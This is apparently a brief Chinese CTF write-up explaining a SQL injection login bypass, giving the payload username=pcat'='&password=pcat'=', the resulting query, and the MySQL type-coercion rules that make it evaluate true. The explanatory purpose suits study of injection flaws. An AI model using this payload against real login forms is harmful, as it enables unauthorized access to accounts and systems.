登陆一下好吗

来源:互联网 发布:网络女主播视频六间房 编辑:程序博客网 时间:2024/04/29 11:46

Sql注入,username=pcat’=’&password=pcat’=’
提交后变成了:username=’pcat’=” AND password=’pcat’=”
巧妙的构造了连个万能钥匙,主要利用了引号的错位,多个等号,已经一下的知识点:
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’

http://www.2cto.com/article/201411/355838.html

0 0
原创粉丝点击